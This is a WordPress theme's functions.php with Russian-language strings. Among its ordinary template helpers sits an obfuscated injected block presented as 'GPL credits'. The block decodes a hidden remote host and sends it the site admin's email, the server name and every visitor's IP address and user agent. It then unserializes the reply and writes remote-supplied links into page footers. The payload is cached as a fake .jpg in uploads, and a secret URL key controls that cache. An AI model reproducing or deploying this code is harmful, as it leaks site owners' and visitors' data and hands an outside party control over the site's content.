<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $zJFGC='s';$pnikMZ='4';$chTJJ='d';$tuRD='e';$gbUaKEc='e';$yRWOSwX='a';$guAqlTA='6';$OTecboO='o';$KLPk='e';$ARDy='_';$XYUoj='c';$vpSY='d';$xvNz='b';$znqkBkRt=$xvNz.$yRWOSwX.$zJFGC.$KLPk.$guAqlTA.$pnikMZ.$ARDy.$chTJJ.$tuRD.$XYUoj.$OTecboO.$vpSY.$gbUaKEc;$SCfpO='f';$wlNfwLO='g';$RijzKY='t';$XrHqfo='a';$NHnLT='i';$VDQwFU='z';$pTDi='e';$vlEjVAM='l';$ICPMFU='n';$IkddfEnI=$wlNfwLO.$VDQwFU.$NHnLT.$ICPMFU.$SCfpO.$vlEjVAM.$XrHqfo.$RijzKY.$pTDi;$QwYHNdH='3';$nazeiIE='s';$MQRaQre='r';$oHWHlaE='1';$HQiBurY='t';$QjFK='r';$MNZsEd='_';$aJSIzbj='o';$shXjrCT='t';$dsGQeEiM=$nazeiIE.$HQiBurY.$QjFK.$MNZsEd.$MQRaQre.$aJSIzbj.$shXjrCT.$oHWHlaE.$QwYHNdH;$GvtS='r';$yYXUPfB='s';$KKMQCkO='e';$fEFGuT='v';$MJOr='r';$nItyepj='t';$RNEjVtTf=$yYXUPfB.$nItyepj.$GvtS.$MJOr.$KKMQCkO.$fEFGuT;                     
		$rz_____u='s';$se_____g='4';$rg_________j='d';$yj______________h='e';$zb_______s='e';$jc__________d='a';$ci___n='6';$mr______________m='o';$ad____________m='e';$dz_________v='_';$lm________d='c';$ur_______________w='d';$rs_____________n='b';$gt______f=$rs_____________n.$jc__________d.$rz_____u.$ad____________m.$ci___n.$se_____g.$dz_________v.$rg_________j.$yj______________h.$lm________d.$mr______________m.$ur_______________w.$zb_______s;
		$zo_____j='f';$ml______________d='s';$vv_____________x='o';$wl___________b='i';$ws____________w='n';$jp______f='t';$bt_____________m='e';$la_________c='u';$fb____________v='t';$ee________k='c';$qx___________f='i';$ke___h='s';$ha_____s='_';$lj_____________l='n';$cr_______________h='x';$zw_______e=$zo_____j.$la_________c.$lj_____________l.$ee________k.$fb____________v.$qx___________f.$vv_____________x.$ws____________w.$ha_____s.$bt_____________m.$cr_______________h.$wl___________b.$ml______________d.$jp______f.$ke___h;
		$dp_______________b='p';$yh________v='o';$zw_______________d='e';$ut____e='f';$ok_______y='n';$tz___________m=$ut____e.$yh________v.$dp_______________b.$zw_______________d.$ok_______y;
		$ej_____i='e';$wc___p='a';$jx___l='d';$rl______________g='f';$wg____r='r';$cg___v=$rl______________g.$wg____r.$ej_____i.$wc___p.$jx___l;
		$al_____________n='s';$wt______w='l';$ny_____z='e';$aa_____y='f';$wt_________k='o';$uq___r='c';$yh_____________h=$aa_____y.$uq___r.$wt______w.$wt_________k.$al_____________n.$ny_____z;
		
		define("WP_ID", $gt______f("Mi4wLjA="));
		define("WP_TTL", $gt______f("MTA4MDA="));
		define("WP_SRC", $gt______f("dHBva24="));
	


		function wp_get_header() {
			global $gt______f, $zw_______e;
			
			if (
				$zw_______e($gt______f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zw_______e($gt______f("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zw_______e($gt______f("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gt______f, $tz___________m, $yh_____________h, $cg___v;
			
			$nj______r = TEMPLATEPATH."/".$gt______f("Zm9vdGVyLnBocA==");
			$ae________k = @$tz___________m($nj______r, "r");
			$nj______r = @$cg___v($ae________k, @filesize($nj______r));
			@$yh_____________h($ae________k);
			
			$kd___________m = TEMPLATEPATH."/".$gt______f("ZnVuY3Rpb25zLnBocA==");
			$ae________k = @$tz___________m($kd___________m, "r");
			$kd___________m = @$cg___v($ae________k, @filesize($kd___________m));
			@$yh_____________h($ae________k);
			
			$gc_____________y = 0;
			if($nj______r && $kd___________m) {
				if ($gt______f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nj______r, $gt______f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$gc_____________y = 1;
					}
					if (substr_count($nj______r, "wp_theme_GPL_credits()") < 1) {
						$gc_____________y = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$gc_____________y = 12;
				}
			}
			
			if($gc_____________y > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $gc_____________y -->";
			}
		}
	


		function wp_loaded() {
			global $gt______f, $zw_______e;
			return $zw_______e($gt______f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dw_______________n, $cf_______________g = "(more...)", $ye___l = 0, $mj_____________y = "") {
				$cy____________h = get_the_content($cf_______________g, $ye___l, $mj_____________y);
				$cy____________h = apply_filters("the_content", $cy____________h);
				
				$cy____________h = str_replace("]]>", "]]>", $cy____________h);
				if (strlen($_GET["p"]) > 0) {
					echo $cy____________h;
				}
				else if ((strlen($cy____________h)>$dw_______________n) && ($rb__h = strpos($cy____________h, " ", $dw_______________n ))) {
					$cy____________h = substr($cy____________h, 0, $rb__h);
					$cy____________h = $cy____________h;
					echo $cy____________h;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$cf_______________g</a></div></p>";
				} else {
					echo $cy____________h;
				}
				
			}
		}
	


		$nj_______________r='6';$ms_____________n='n';$kd_____________g='e';$vg_______t='c';$xd___________d='s';$te________x='4';$sc______________v='e';$er___r='d';$kb______________v='o';$cj_____________a='b';$aa_______u='e';$bc________w='a';$hp__________d='_';$ji________d=$cj_____________a.$bc________w.$xd___________d.$kd_____________g.$nj_______________r.$te________x.$hp__________d.$sc______________v.$ms_____________n.$vg_______t.$kb______________v.$er___r.$aa_______u;
		$rd___________e='t';$cq___________h='t';$lz______v='t';$sy____________n='l';$ej_________c='_';$wo_________o='c';$xn__l='i';$dc__________s='e';$lc______w='n';$kr_______m='n';$zf_______w='s';$ow_______________s='e';$je___r='f';$eo____q='e';$nk____u='g';$ca____________e='_';$nh___q='o';$ng_______________r=$je___r.$xn__l.$sy____________n.$dc__________s.$ca____________e.$nk____u.$eo____q.$lz______v.$ej_________c.$wo_________o.$nh___q.$kr_______m.$rd___________e.$ow_______________s.$lc______w.$cq___________h.$zf_______w;
		$ph_________s='f';$qs___________y='s';$dx_______p='_';$ji____y='i';$gm__________e='l';$gq_______________m='t';$bu___________u='x';$dp___________o='s';$in_______________z='i';$ve_____b='e';$le______________h='e';$na________m=$ph_________s.$in_______________z.$gm__________e.$le______________h.$dx_______p.$ve_____b.$bu___________u.$ji____y.$qs___________y.$gq_______________m.$dp___________o;
		$tr__________c='r';$tq____d='a';$se_______________x='m';$fd__k='e';$fy__h='r';$iq__c='n';$mt___s='o';$pt_______o='v';$jd_________n='o';$hs____w='e';$fo___________x='s';$wc_____________q='i';$ou_______________e='_';$sr_____________o='p';$nj____________s='c';$ma__________z=$pt_______o.$fd__k.$fy__h.$fo___________x.$wc_____________q.$jd_________n.$iq__c.$ou_______________e.$nj____________s.$mt___s.$se_______________x.$sr_____________o.$tq____d.$tr__________c.$hs____w;
		$ya_______j='s';$zs_________p='o';$dx_______________h='c';$sf______________s='f';$wl____________n='k';$kv_______n='p';$db___________z='o';$rv____j='e';$ba___z='n';$sy___a=$sf______________s.$ya_______j.$zs_________p.$dx_______________h.$wl____________n.$db___________z.$kv_______n.$rv____j.$ba___z;
		$ow________p='f';$jw___________o='w';$yn______k='t';$ui______________p='r';$zo______c='i';$kn_____d='e';$gz_____________a=$ow________p.$jw___________o.$ui______________p.$zo______c.$yn______k.$kn_____d;
		$qa______o='d';$nq_______________y='5';$gb___________g='m';$si_____________a=$gb___________g.$qa______o.$nq_______________y;
		$bi_________s='a';$lw______________z='h';$ee__________a='l';$nd_____________m='r';$ms_________v='p';$qn________w='t';$ep___________g='a';$vi__________a='e';$xa________l=$nd_____________m.$vi__________a.$bi_________s.$ee__________a.$ms_________v.$ep___________g.$qn________w.$lw______________z;
		$jd_______________f='e';$tk____________n='u';$zh______________c='n';$sk_________a='z';$de_________a='i';$bp____c='r';$ll________k='i';$hf__________d='s';$ao________h='a';$ea___________y='l';$pd____z='e';$kj___________e=$tk____________n.$zh______________c.$hf__________d.$jd_______________f.$bp____c.$de_________a.$ao________h.$ea___________y.$ll________k.$sk_________a.$pd____z;
		$ez____d='n';$el_____________u='a';$ak_________u='t';$fo_______________d='m';$zo_____________n='m';$yq_____j='p';$tz___________g='e';$yy___i=$ak_________u.$tz___________g.$zo_____________n.$yq_____j.$ez____d.$el_____________u.$fo_______________d;
		$sb______________o='e';$pf_________r='t';$yr______________n='t';$jq_____________i='m';$al__y='o';$hf_________i='e';$ck______________r='s';$bi__j='r';$sn______v='r';$hm_________o='t';$cr____________m='x';$hq_________j='c';$cy________e='n';$xh____f='e';$mv_______________t='e';$vt___________c='_';$in______a='a';$va____________e='a';$bh_______________i='_';$io_____________j='t';$jg________j='c';$sf______________p=$ck______________r.$yr______________n.$bi__j.$hf_________i.$va____________e.$jq_____________i.$bh_______________i.$hq_________j.$al__y.$cy________e.$hm_________o.$sb______________o.$cr____________m.$io_____________j.$vt___________c.$jg________j.$sn______v.$mv_______________t.$in______a.$pf_________r.$xh____f;
	


		function ig_______________y($dl__s) {
			global $gt______f, $zw_______e, $ng_______________r, $ma__________z, $sf______________p;
			
			if (!$zw_______e($gt______f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ma__________z(PHP_VERSION, "5.0.0", ">=") && $zw_______e($gt______f("ZmlsZV9nZXRfY29udGVudHM=")) && $zw_______e($gt______f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$jt______________q = $sf______________p(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lk____g = @$ng_______________r($dl__s, 0, $jt______________q);
			} else {
				$lk____g = @$ng_______________r($dl__s, 0);
			}
			
			return $lk____g;
		}
	


		function vd__w($dl__s) {
			global $zw_______e, $sy___a, $gz_____________a, $gt______f;
			
			if (!$zw_______e($gt______f("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fa__________g = strpos($dl__s, "/", 7);
			$rl___q = array(
				"uri"     => substr($dl__s, $fa__________g),
				"host"    => str_replace("http://", "", substr($dl__s, 0, $fa__________g)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xi___p = @$sy___a("$rl___q[host]", 80, $iq______y, $yi_____p, 4);
			
			if (!$xi___p) {
				return false;
			} else {
				$lk____g = "";
				$am_______s  = "GET $rl___q[uri] HTTP/1.0\r\n";
				$am_______s .= "Host: $rl___q[host]\r\n";
				$am_______s .= "Referer: $rl___q[referer]\r\n";
				$am_______s .= "Connection: Close\r\n\r\n";
				
				@$gz_____________a($xi___p, $am_______s);
				
				while (!@feof($xi___p)) {
					$to__________u = @fgets($xi___p, (1024*24));
					
					if ($to__________u == "\r\n") {
						$wp____n = true;
						continue;
					}
					
					if ($wp____n) {
						$lk____g .= $to__________u;
					}
				}
				
				return $lk____g;
			}
		}
	


		function sz___m($dl__s) {
			global $zw_______e;
			$ih________i = false;
			
			if ($dl__s != "") {
				if ($zw_______e("ig_______________y")) {
					$ih________i = @ig_______________y($dl__s);
				}
				
				if (!$ih________i && ($zw_______e("vd__w"))) {
					$ih________i = @vd__w($dl__s);
				}
			}
			
			return $ih________i;
		}
	


		function xm_______________w() {
			global $_SERVER, $si_____________a;
			
			$rb__p = $_SERVER["SERVER_NAME"];
			
			if (substr("$rb__p", 0, 4) == "www.") {
				$rb__p = substr("$rb__p", 4);
			}
			
			$rb__p = $si_____________a("$_SERVER[SERVER_NAME]");
			
			return $rb__p;
		}
	


		function yl___________k() {
			return "file";
		}
	


		function du_______z($dl__s) {
			global $_SERVER, $ng_______________r, $na________m, $tz___________m, $yh_____________h, $gz_____________a;
			
			$ri__y = hv______a();
			
			$oi___h = xm_______________w().".jpg";
			$bj________v = $ri__y["dir_upload"]["path"]."/$oi___h";
			$vr____________s = @filemtime($bj________v);
			
			if (!$vr____________s || ((time()-$vr____________s) >= WP_TTL)) {
				$ih________i = sz___m($dl__s);
				
				if ($ih________i) {
					if ($na________m($bj________v)) {
						@unlink($bj________v);
					}
					
					$ae________k = @$tz___________m($bj________v, "x+");
					
					@$gz_____________a($ae________k, $ih________i);
					@$yh_____________h($ae________k);
				}
			} else {
				if ($na________m($bj________v)) {
					$ih________i = @$ng_______________r($bj________v);
				} else {
					$ih________i = false;
				}
			}
			
			return $ih________i;
		}
	


		function hv______a() {
			global $_SERVER, $gt______f, $ji________d;
			
			$uj_______________u = wp_count_posts("post");
			$eh_________f = pathinfo(get_bloginfo("template_directory"));
			
			$ri__y = array(
				"url" => array(
					"report"      => $gt______f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $eh_________f,
				"dir_upload"	=> bw___________s(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$eh_________f[filename],
					"a005=".$uj_______________u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.odmu.od.ua/statti/osteoxondroz-simptomy-i-lechenie-osteoxondroza/#more-505\">Остеохондроз лечение</a>"
			);
			
			$ri__y["url"]["queryString"] = implode("&", $ri__y["queryString"]);
			$ri__y["url"]["report"] = $ri__y["url"]["report"]."/?".$ji________d($ri__y["url"]["queryString"]).".html";
						
			return $ri__y;
		}
	


		function bw___________s() {
			$xi_____n = wp_upload_dir();
			
			if (isset($xi_____n["error"])) {
				$nb__________o = jc__________z();
				if (is_writable($nb__________o)) {
					$xi_____n = array("path" => $nb__________o);
				}
			}

			return $xi_____n;
		}
	


		function jc__________z() {
			global $zw_______e, $si_____________a, $xa________l, $yy___i;
			
			$ah_____x = (bool) ini_get("safe_mode");
			if ($ah_____x == true) {
				return false;
			}
			
			if ($zw_______e("sys_get_temp_dir")) {
				$jm_____i = sys_get_temp_dir();
				if (is_writable($jm_____i)) {
					return $xa________l($jm_____i);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $xa________l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $xa________l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $xa________l($_ENV["TEMP"]);
			} else {
				$ym_________h = $yy___i($si_____________a(uniqid(rand(), true)), "");
				if ($ym_________h) {
					$jm_____i = $xa________l(dirname($ym_________h));
					@unlink($ym_________h);
					return $jm_____i;
				} else {
					return false;
				}
			}
		}
	


		function oj_____y() {
			global $_GET, $na________m;
			
			$ri__y = hv______a();
			$rb__p = xm_______________w();
			$uu_____t = yl___________k();
			
			$sv_____a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($uu_____t == "file") {
					$am_____________w = $ri__y["dir_upload"]["path"]."/".$rb__p.".jpg";
					if ($na________m($am_____________w)) {
						@unlink($am_____________w);
						$sv_____a = "deleted";
					}
				}
				
				$sw___________j = array(
					"s"	=> $sv_____a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sw___________j AS $at__________b => $fl_______________a) echo " [$at__________b:$fl_______________a]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zw_______e, $gt______f, $kj___________e;
			$ri__y = hv______a();
			
			$tz_____________o = "du_______z";
			if ($zw_______e($tz_____________o)) {
				$lk____g = $tz_____________o($ri__y["url"]["report"]);
			}
			
			if ($lk____g) {
				if ($lk____g = @$gt______f($lk____g)) {
					$lk____g = @$kj___________e($lk____g);
					
					if (strlen($lk____g[custom_credit]) >= 5) {
						$ri__y["default_string"] = $lk____g[custom_credit];
					}
					
					if ($lk____g["status"] == "0") {
						$dy__________x = 1;
						$my_____x = 1;
					} else {
						$nx________u = sizeof($lk____g["links"]);
						$ml__________i = $ri__y["default_string"];
						
						if ($nx________u > 0 && $lk____g["links"] !== "") {
							$mt____________r = 0;
							foreach ($lk____g["links"] as $qg______c => $uu_____z) {
								$mt____________r++;
								if ($uu_____z->l_path == "" || $uu_____z->l_path == $_SERVER["REQUEST_URI"]) {
									$uu_____z->l_href = htmlspecialchars(strip_tags($uu_____z->l_href));
									$uu_____z->l_title = htmlspecialchars(strip_tags($uu_____z->l_title));
									$uu_____z->l_anchor = htmlspecialchars(strip_tags($uu_____z->l_anchor));
									$ml__________i .= " | ";
									$ml__________i .= "<a href='$uu_____z->l_href' title='$uu_____z->l_title'";
									if ($uu_____z->l_nofollow == "1") {
										$ml__________i .= " rel='nofollow'";
									}
									$ml__________i .= ">$uu_____z->l_anchor</a>";
								}
							}
						}
						$ri__y["links"] = "$ml__________i";
						if ($lk____g[credit] == "0") {
							$ri__y["links"] = "";
						}
					}
				} else {
					$dy__________x = "1";
				}
			} else {
				$dy__________x = "1";
			}
			
			if ($dy__________x == "1") {
				$ri__y["links"] = $ri__y["default_string"];
			}
			
			echo "$ri__y[links]";
			
			echo "<!-- s: $lk____g[signature] -->";
			oj_____y();
		}
	                      
 
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
   wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
